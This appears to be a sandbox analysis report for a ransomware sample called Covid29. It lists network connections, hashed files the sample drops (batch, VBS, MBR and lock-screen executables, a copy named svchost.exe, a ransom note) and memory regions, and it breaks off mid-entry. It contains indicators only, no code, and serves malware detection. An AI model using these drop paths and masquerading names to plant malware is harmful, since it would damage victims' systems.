US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 github.com udp
US 140.82.112.22:443 collector.github.com tcp
US 140.82.113.3:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
US 140.82.113.6:443 api.github.com tcp
US 8.8.8.8:53 22.112.82.140.in-addr.arpa udp
US 8.8.8.8:53 3.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 6.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4aab618ef3d86f2fbf808c4ac50ab083
SHA1 3f794d5499a16d7048809b46589984a065164ed0
SHA256 4971c4c535809b9ffe1b1d9b22e7d9ade38d51a4406def14c54708a87c2e4dc2
SHA512 21adbdb317cb85cbcb370003a09fa6f75fd8ba65b4453d33f6f3abd6449c9c0ce97a9480fd5c058885a264364b2c00e7979a7bd285b76b296c56f85e207babeb

\??\pipe\LOCAL\crashpad_2580_PKWRLELZEXFCVMAQ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8c7e49ac9fe8830787a3f8e642b1c85a
SHA1 93c4941cec8ead8330fed3b54dc7f8999e45a9be
SHA256 1aa8155b8a8eb52f73621c05a90a9488f130866365e5d72b0b6f4f7e97721629
SHA512 c30d371594ef628e59846db1e66f331454d2720848144c14f88614adec7d963724c5cc4346c6e413ec6b74984bed2f6cff62fab2e0261d195fd999fd197fd41f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 fe65730d0de96c4383cee94736370411
SHA1 1e6b771a8c6c122ffacb53cdd2822873cb63987b
SHA256 c1bcabc5d3974835b5d5983f47bb626311b6e6f85bd3b77a6fbcc10d437c1bb9
SHA512 4fc6b92feff2d7903744fe7f0ab51b1e0da5b146b297e83a304b801e7e11b6efd37d8de6ee3b9fc4327efe7020c26c17260bd6bf474eacc22e5ac5e9f23ba209

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 02863f5f3a996e5ca812f3064affdf72
SHA1 7601f1b2accf68fac44ba62c7c4dc7665034c46e
SHA256 50052329928277e0fd44c6b8cd8b081466540eec4131eb2c82923baa36ac310d
SHA512 25dce01429a8ea1b4e673596c0e2a29d29b9a1b051857f23ba4e16f7a3ceb035ec854cab98115ce02542c26680f2c69bd45f748abe544d9a1151807d87b242bc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\06f156ce-12ac-4051-bbc5-05a5c572c5e8.tmp

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 7caf65193db27a3b881dfb25b62ce529
SHA1 304e35e18f36b79acae60f4a426f0ab861a651b5
SHA256 eaa4cdd8c166fc998235daec7bdc3fc2a9ef1e2207be2f4eabb8fbb564ead890
SHA512 96231ea6ea8f879e0d2f48fd7bca3480ef78df283d135a1f631faf701215c4d9477b1a8eb59a24b8f08d060b71e250e04deaf49ea08758993b77199a6bc5cd69

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 486c6533a423ed798c61773a3fbf7655
SHA1 33fb361dd3d90c7fa9079be2c06261471e3ba36d
SHA256 4776ac062fb24399f4df01d4f5996b6ea22be3c5bcf18b7f1007e28606dde516
SHA512 ee2f83dabded65c8016f54d08be6f21db37d29c3f8ecee2683b88bbe582bd77eac43fc384a6da6e5dc365c966da124f261f8db20e33cd3b5b71ca9e029e89685

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5800b7.TMP

MD5 180b09c2addd831fdd8e11a6b5be29fe
SHA1 a6b50025b5bed15ba2d2629eb846230e40324543
SHA256 e695c830c498b29690d8b3d0f9f9da3a4e0061f94cc929c109407bd5c3baac15
SHA512 b753100184d09d695098605e13395465094d73336509c4c2930f8a92685a43ebe372a1324cf6f2bee3732ccaa9e793d1e55290ed32630cfdc65422a4b2aa4a65

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 004f854b609d83509eddc1a91366e026
SHA1 a2e3ac83bf65cd29669140eaa3334a81110d77ae
SHA256 5ed82f6a2f7337f88652dd99c52e21e9d67c5da96456550d145ec31c9ae26110
SHA512 89b733ff9485f4b0144419f331bf6f6b927f7d3981abea7aa3a6e0a4eb93e2e2e37d8e833df0fecea16dd356e048f02f13f83dda8c5cf6a1055c97ad88abb1f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0b9384c39165fcada192add60e7f6a65
SHA1 d742f3544c05a9e84a03900c705f1a5f033ae703
SHA256 6428ba8fbf5a690690f1dd5c56182a9f3575b4feac31a2689f06218f8cdf3f55
SHA512 82700b308e21ab4e69723fb5245918384f1248a81a558e6060e83806d7c4f7fae5c28fe57d0615d3e8cb8f478fa2dec76d07950d229d5f469bf38ce2f2621e1a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

MD5 cc5f6921b7e2d3c1ae0da911886291b2
SHA1 372dd6699f897f862c20b31452d6d73c927a253c
SHA256 fe9cd27dba601b9236f44337b0cb45a29e22f8b0e46a1e90e4a586ff2c014da3
SHA512 1577211e82a11fa304ecf0b853de1045f2d08a61806caae53385fe8ec1fe95804b3034770bfc5cb7b790ab893678550978d663c8b12c2d12a3247e80005731d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

MD5 035ef6eaf7accadce25b54de51a58b43
SHA1 6622e6858ee1349437d58c29fe821390c27cef41
SHA256 c29fd8d1af7a65a8ee253f331922fe84445b275926596fcefd3d2fcc02bf842a
SHA512 d6a21d79e3f10a9c4ad0b1d0294922a90a8485170e514129b71eb0c287925d6a80b8c4d5e246faaf86964ffe4841aee78a8fb7a3b6c5d4f6fb0a82a73dfb69ef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

MD5 d574939016c1b0511053c934958d9a25
SHA1 1ebb35cd6af10fce71dcd4778c9bbcd9822ef999
SHA256 ad0ad0fb63aff674e004faa8c826d6523a79532133fc07eb9a2ee5a1d367ec66
SHA512 48758079cd42e05da63126f5119d15a4f79520095d062b67490b637df8fc12d567eaa2ec9c083d747093fbefedc651fbb3a2bc4f2fbbab9b5a09379626a40ceb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a5a8c677ce981e93844f0e7b682a1ab6
SHA1 6feca55535be8d7a4a8be280f0b96269ca61afbd
SHA256 2e3d1e2c97c572a2387e11dfa9a293eca22d3ecab72f27ff2d869f22d86029e5
SHA512 0dd14c10ec04ab0e14565917eeddcb021aa034a16ea53a501104e181bf7d4a2b091270b952d52adabf3960da9d4fcc1851c5da449c2c969c5aa2d33e746453f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 0e313b24e6e339121717c4821ccf621d
SHA1 b146f0c47340700358fbc74ad89c37e4e2821cf7
SHA256 669295aacff33b8490a66ac59848f23d46269cf5298fbcafc8102454c77a8679
SHA512 f5c2a2fac14637fe123873888a779a0d7fb383b44cf4862e801cb1facdf329b9f4b231ecc35e34fd1f9b8911adfcd3ba24ed51a0a1e7e0aeca71924b723e6baf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6bb34f03c35aa4eee639d6a0f0bc4cdf
SHA1 48eff5536bbbd4691ad48dfd381cb3ba33958019
SHA256 2fbca236bcd76029fdd3db7d164855f574d78c5e34a72ac123ceac476faf63dc
SHA512 2d8a75858d7cb2f33721c5ef6fbfaa5b7ced04b1f683f37d135626670b6fa57e3907d88a86f619e390dad3a94526d28bef95ed78dc98b704eeeceb14e783840e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e7c317ead1d577db63fc3187ade53536
SHA1 b87e9f43382e630fe531ef2840a3aefc2c6c0ba6
SHA256 10bcc99c64ca293aa9655002178cd284c0188a9f19bafeeb86b063cf8f9a9d99
SHA512 b5149d473ef11450a7eb8facff7a8d6bddec4951cae42f5f9eb25f50cdc4817b8e847c5012b019d3eaa11209ed4ff70fe4cad5f4f57bdfe0b12680cf2ca2e78e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 09c00e63796ab6ec371a8e538a36c0c7
SHA1 75b5c0ce4cfad490779a323a3200f4ff9e14289b
SHA256 42a2c662f46b23a83ce0d9e480bec618c95e5e370a5a406fe8fc89d48dbab362
SHA512 b036f2670076598c2066c2fb6318cfc34099f4b6a62c4fa2047c37943c10bfae2a07eaa924d5767fad41fafcb24a3407061a389521842771bf971dfc443fa694

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b8d8ab852084c703039b2d81f76b1732
SHA1 1c04d070d8f9a0886418fe6bc5fd722f1dbe6170
SHA256 c81ff20a3f927bd69d77530faf0adaf1c3a224bc0efa84fb86cfe9c2fb22b22c
SHA512 eb9a10fc9b4dafa63e0174c92e30d32869fde0fef5f9598aef603681c01866c26406746300fc7181789f9a5f9bc572770ef4f4b9d263bf74cfd629c4c2b479fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 39197eb84e52d0d34617b4b79e3cb2b5
SHA1 417e21548454de6e34823f22d45c5d3398a7e87b
SHA256 9cc71549037c98aa16fd271a957d90eb987598632b965a5bf2868bfdf0f82b0d
SHA512 3dc74e8cefcf6f676e1899a1d1e14f632d49325882b810300c392313f8eb8f70d3c9b9902f1416a612ab2e7f7f487f3b65ab3362cb84b2c8334a950570062023

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 84156f9d8b6b478787630afdf802c70a
SHA1 1dadcf1ae8da038feb98c1f28f3150509ae04f7d
SHA256 e398160f5d2b091b4da17dc3cab49ccd3c1b4cf9c535dbb3c6bfbaa4c75e62b3
SHA512 9535eff069beedde8c39f67716970a14822945ece285f248257254cfd3dba4d383ace37766144d29d4ad633a20ecc1a4c0b39e05b288fe7707ca9d3e11a6f136

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\d8d0d17c-eaf1-44c9-ac3f-e848db63be1d.tmp

MD5 c5a52dd3c34e6cda7d40f5cd252a3f4c
SHA1 148f1313220fd2c640bf32c1aec014c32083f363
SHA256 b876fc25b7743dcf37f3471152b6a95e0306338a6d285ac6f5779a214f590354
SHA512 d99d3e482f79561d5b1215f1355208b988acac710053abc91f2eba38359a49b240370c12d15a651ce7404e8cf41944ea124210d43866ae075d3de55875c6d3af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5d78edc5afb364a4090a2fdd48599064
SHA1 95107172fed1b2f583def8f5ca2f37ed47e48731
SHA256 7f57c121682ffbfca884506a7c8ee313fb13f69a9c7c7c0c7fc76dc087ea42e2
SHA512 bd290c30f4284150978d461bce6527993a258ab9180ff9eeddec5012e30a3a447b975af491e4c6ac9f7cef30a670e7fe87b22b081d5d505c471abbb092ac0984

C:\Users\Admin\Downloads\Covid29 Ransomware.zip

MD5 272d3e458250acd2ea839eb24b427ce5
SHA1 fae7194da5c969f2d8220ed9250aa1de7bf56609
SHA256 bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3
SHA512 d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e3c88410a8bc9a1189cfc18a352fc521
SHA1 a9404398052906745b79c3b666639e66d486eefb
SHA256 623926fae926d528ea6d173a5f9dcd4fadd3dccabdea5d0e9f782771c511e06c
SHA512 c1b549c6a3dd4b7902e6936fdff85ea2cc02215c0b38d2a3cbb103b1aa2efe8b6b2074d7a1c247b495161073178e72e48fa620f3b88b302d0fe5d6ae67f4e740

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 fd808a590eafc835519229ab93afd7e1
SHA1 27f7d631a4ff4e45872149b6cc4e6f95556e11d2
SHA256 b28c67b074ea2067746354d4729edf04f2bde425d0abe71f554dd110bc7eb27f
SHA512 109c440612c7b915ec706f4413dad7ec8d5f490d7fa244482347754e2e4181ce6bfe097711bd587ef207fb1f19e610b7339fd6d7f6321b6be892c3ee30e6020e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5062bdc0cb1b8195f51b6fa38ff91bca
SHA1 13693b0a3487e5ef6d6f727782ec936c4c0210af
SHA256 42019caa7d642942d82d59edd5e5bdd1f4a9f0a4707d0c608a095c2ecac26c52
SHA512 f514f3f4e6e15980fa6f1ae8fea45a6319c36195b38e1e473f5944e5ddb7b27ac5a75e182e5ce566a3d276f46a00594bbbbb03b384efbe7af6fce248cc0283d9

memory/2440-582-0x0000000000400000-0x00000000005D5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7f2e2ba46e5393145197166d67f76406
SHA1 14d9b4c1218fea9bc89dca1093461f01ef0fe4a3
SHA256 caaf9d707cbd7d6124caa869c3218227ecbaecea467cdd5e49b0874bce819762
SHA512 a5a0d816a2f12b2fabce844db3a5b74062a46e9a15bc1d8e9d39f5b8494d7555bc80a0374e56067d8d1ef40d8ff85530d8ed4a945167f8cca6ebc1ef785c9384

C:\Users\Admin\AppData\Local\Temp\2315.tmp\TrojanRansomCovid29.bat

MD5 57f0432c8e31d4ff4da7962db27ef4e8
SHA1 d5023b3123c0b7fae683588ac0480cd2731a0c5e
SHA256 b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc
SHA512 bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

C:\Users\Admin\AppData\Local\Temp\2315.tmp\fakeerror.vbs

MD5 c0437fe3a53e181c5e904f2d13431718
SHA1 44f9547e7259a7fb4fe718e42e499371aa188ab6
SHA256 f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22
SHA512 a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

C:\Users\Admin\AppData\Local\Temp\2315.tmp\mbr.exe.danger

MD5 35af6068d91ba1cc6ce21b461f242f94
SHA1 cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA256 9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512 136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

C:\Users\Admin\AppData\Local\Temp\2315.tmp\mbr.exe

MD5 35af6068d91ba1cc6ce21b461f242f94
SHA1 cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA256 9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512 136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

C:\Users\Admin\AppData\Local\Temp\2315.tmp\mbr.exe

MD5 35af6068d91ba1cc6ce21b461f242f94
SHA1 cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA256 9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512 136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe.death

MD5 8bcd083e16af6c15e14520d5a0bd7e6a
SHA1 c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256 b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA512 35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe

MD5 8bcd083e16af6c15e14520d5a0bd7e6a
SHA1 c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256 b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA512 35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe

MD5 8bcd083e16af6c15e14520d5a0bd7e6a
SHA1 c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256 b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA512 35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29Cry.exe

MD5 8bcd083e16af6c15e14520d5a0bd7e6a
SHA1 c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256 b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA512 35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

C:\Users\Admin\AppData\Local\Temp\2315.tmp\mbr.exe

MD5 35af6068d91ba1cc6ce21b461f242f94
SHA1 cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA256 9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512 136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

memory/228-624-0x0000000000680000-0x00000000006A0000-memory.dmp

memory/4668-623-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/228-625-0x00007FFA73560000-0x00007FFA74021000-memory.dmp

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 8bcd083e16af6c15e14520d5a0bd7e6a
SHA1 c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256 b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA512 35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 8bcd083e16af6c15e14520d5a0bd7e6a
SHA1 c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256 b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA512 35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

memory/2212-639-0x00007FFA73560000-0x00007FFA74021000-memory.dmp

memory/228-638-0x00007FFA73560000-0x00007FFA74021000-memory.dmp

C:\Users\Admin\Desktop\covid29-is-here.txt

MD5 c53dee51c26d1d759667c25918d3ed10
SHA1 da194c2de15b232811ba9d43a46194d9729507f0
SHA256 dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52
SHA512 da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

C:\Users\Admin\Downloads\Covid29 Ransomware.zip

MD5 272d3e458250acd2ea839eb24b427ce5
SHA1 fae7194da5c969f2d8220ed9250aa1de7bf56609
SHA256 bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3
SHA512 d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

memory/2440-690-0x0000000000400000-0x00000000005D5000-memory.dmp

C:\Users\Admin\AppData\Roaming\covid29-is-here.txt

MD5 c53dee51c26d1d759667c25918d3ed10
SHA1 da194c2de15b232811ba9d43a46194d9729507f0
SHA256 dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52
SHA512 da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29LockScreen.exe

MD5 f724c6da46dc54e6737db821f9b62d77
SHA1 e35d5587326c61f4d7abd75f2f0fc1251b961977
SHA256 6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c
SHA512 6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

C:\Users\Admin\AppData\Local\Temp\2315.tmp\Cov29LockScreen.exe

MD5 f724c6da46dc54e6737db821f9b62d77
SHA1 e35d5587326c61f4d7abd75f2f0fc1251b961977
SHA256 6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c
SHA512 6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

memory/2440-699-0x0000000000400000-0x00000000005D5000-memory.dmp

memory/2212-702-0x00007FFA73560000-0x00007FFA74021000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 f70d947de1d4410e85b90dfdf42d0c07
SHA1 3bbd2fb710fb0491277044d87e647c5814c6728a
SHA256 0de0ba0af4df0da804d7ddebfbbcce8ae0a68f11fb9d0f9858edf05aadb60f98
SHA512 9ebbd15487a14444a9171b23f8e48b3f66db273c49044a2fd9be2ca3d523084b3f5157bba76d124bcd31ad9e460f6dbd8e776199caef20bcee21de4a68abb2d5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 521dc30458322e76fd465aa715a27939
SHA1 39d23a1642edb3ae5617f27c346b86a066365e53
SHA256 bc16c9282af3bd5f8fd6257722966cd7e520cc6453e6f6c0d0158032e6110ea1
SHA512 a1dab9417049ead32d46177d3d268542ba5e730a0ced4d350736aeb6a916587c22c5e79554f503fcf5fb31ab1b59b668410608ebcf6d16be81285af94083f97c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 668ae2b8e13fbe77680938da5b8e5b48
SHA1 67edd8959f50774c6c478567d6159615066571d7
SHA256 38d0f325454b47da53c1a82c808d42812f0e4f4c7018a206ed4f293e9ef69481
SHA512 eee52b3cbbdfdd662a310145052de85b60d018770befe84935fce007c6c5563f9db8722b7adec7e5e002f71acca7e9de96e131188f868ef6fe65891c8d0985f8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 47c4f9027a052ef86dedc39fcf2a203b
SHA1 a36094e97dd09ec7a406b883cc527587268ce03f
SHA256 5c892508c049d56d307205b002e939f4c6b33ba019b623c4e0ac275be5109642
SHA512 66ea71507208204cc33c87a66513c2b87d2f69ca5a5b72594b75e4aa2f3ed0791ea2f81a376580678152ec2879a89ac6a606ced3fdaf266b88d67b4adb6f4270

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\00e71b3f-92ca-4dee-9b72-af7308d5437c\0

MD5 a725357eb37e4b43a65b9dfb50202c1d
SHA1 3308690577f8186444eeb242bb4e75cf45a6a4e8
SHA256 c760b5f8e5dc948db88e266ad5b44322d210d2d5f54a0300d17e19c3f5d3906c
SHA512 e1e8ea6e907c5afb29e392e02d93b2596839583aff3cecd7097611705496c7509b268d0c3340e819985715ce7b3cedb32972367f431ab9d21d7dfcf83e9766d6

C:\Users\Admin\Downloads\Unconfirmed 431563.crdownload

MD5 ac9526ec75362b14410cf9a29806eff4
SHA1 ef7c1b7181a9dc4e0a1c6b3804923b58500c263d
SHA256 5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164
SHA512 29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\53c84e27-0f1f-4547-ac5a-6c6846b0b2a1.tmp

MD5 29d605fbd0ce3a33e4c6591d1e0b9fe0
SHA1 766155a44e6d460360c0e35916e4e93646509e23
SHA256 e683001998ca7186cd5c55615cee9cdc57733df7fcf7abebfdb6d2df30277528
SHA512 586b88bf0e1e488f0a6c00cf38c748eb985dd16db64a1d0d4f6d20706ed3d96075afe35a706071e904a3386d3c774db95aac0cd706249ee5cf9dc72eab213d9d

C:\Users\Admin\Downloads\ScaryInstaller.exe

MD5 ac9526ec75362b14410cf9a29806eff4
SHA1 ef7c1b7181a9dc4e0a1c6b3804923b58500c263d
SHA256 5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164
SHA512 29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621

C:\Users\Admin\Downloads\ScaryInstaller.exe

MD5 ac9526ec75362b14410cf9a29806eff4
SHA1 ef7c1b7181a9dc4e0a1c6b3804923b58500c263d
SHA256 5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164
SHA512 29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621

memory/2260-810-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c4f4335c7521fe2ab6670f2aba43ecf7
SHA1 efb2fd1bab98969942897ba61c7ccf2fe4bd0696
SHA256 d1c3b9007c96f0ee34fdf15bca6aacfdcdb4428a02ab907c1535e588dabe282e
SHA512 86640418574b709a886d287f98e98d8a8e7d3cff74b10151d9788e35e205f63889604007fc4b2edae29327711b4029d81d42c4b970c4a2b6cb2c78a2361718e9

C:\Users\Admin\Downloads\ScaryInstaller.exe

MD5 ac9526ec75362b14410cf9a29806eff4
SHA1 ef7c1b7181a9dc4e0a1c6b3804923b58500c263d
SHA256 5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164
SHA512 29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621

memory/5024-821-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A914.tmp\creep.cmd

MD5 e77d2ff29ca99c3902d43b447c4039e2
SHA1 2805268a8db128a7278239d82402c9db0a06e481
SHA256 1afa31c6764bdb1d9d7e6c61bf7a6f2607fbc5061e7a0e5a56004694a2fd6f4c
SHA512 580e3550c6751c58db5874eacde15aa80743625bf920d1191589c2aa7211896b378956dbe7070dcfe2f78a8028d92a8e6dceda8a8d2415b2600fc69f52833f2c

C:\Users\Admin\Downloads\ScaryInstaller.exe

MD5 ac9526ec75362b14410cf9a29806eff4
SHA1 ef7c1b7181a9dc4e0a1c6b3804923b58500c263d
